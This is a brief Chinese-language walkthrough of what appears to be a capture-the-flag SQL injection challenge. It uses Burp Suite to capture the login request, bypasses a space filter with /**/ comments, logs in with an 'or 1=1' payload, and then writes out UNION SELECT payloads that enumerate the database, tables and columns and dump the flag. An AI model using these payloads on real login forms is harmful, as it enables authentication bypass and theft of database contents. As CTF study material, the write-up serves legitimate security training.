我们用bp进行抓包处理,在这里面我们可以看到
提交后我们可以看到
这里面他过滤了空格所以我们就使用/**/
admin'/**/or/**/1=1#
这里我们就可以看到我们登陆成功了,
然后我们就可以用sql基本语句来进行注入
admin'/**/union/**/select/**/1,database(),3# (爆库)
admin'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#&password=123(爆表)
admin'/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name='flag'#&password=123(爆出flag字段)
最后就是爆出字段的内容
admin'/**/union/**/select/**/1,group_concat(flag),3/**/from/**/flag# &password=123